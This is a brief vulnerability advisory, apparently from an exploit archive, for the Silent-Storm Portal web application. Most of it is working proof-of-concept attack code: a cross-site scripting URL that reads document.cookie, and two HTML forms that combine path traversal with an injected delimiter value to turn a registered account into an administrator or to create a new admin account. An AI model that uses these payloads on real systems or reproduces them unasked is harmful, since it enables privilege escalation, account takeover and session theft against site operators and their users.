|
|
Silent-Storm Portal Multiple Input Validation Vulnerabilities
No exploit is required, however the following examples are available: http://www.example.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E Register a user account then login and run the exploit.html ---exploit.html---- <form method="post" action="http://www.example.com/index.php?module=../../profile"> <input type="text" name="mail" value="any@mail.com"><br> <input type="hidden" name="mail" value="<~>1<~>"> <input type="submit" name="post" value="Get Admin!"> </form> ---/exploit.html--- ---exploit2.html---- <form method="post" action="http://www.example.com/index.php?module=../../Home"> User:<input type="text" name="usr" size="10"><br> Pass:<input type="password" name="pas" size="10"><br> <input type=hidden name="ema" value="any@mail.com<~>1<~>"><br> <input type="submit" name="reg" value="Create Admin!"> </form> ---/exploit2.html--- |
|
Privacy Statement |